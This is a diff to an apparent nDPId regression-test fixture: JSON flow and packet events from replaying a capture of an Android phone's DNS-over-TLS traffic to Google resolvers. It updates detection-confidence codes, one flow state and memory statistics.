@@ -37,25 +37,25 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"} 
-00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} 
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 
+00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":532,"packets-processed":532,"total-skipped-flows":0,"total-l4-payload-len":97842,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":6,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":59,"global_ts_msec":1592553079303} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 532/532 @@ -65,9 +65,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5918203 bytes -~~ total memory freed........: 5918203 bytes -~~ total allocations/frees...: 118740/118740 +~~ total memory allocated....: 6051837 bytes +~~ total memory freed........: 6051837 bytes +~~ total allocations/frees...: 121502/121502 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars 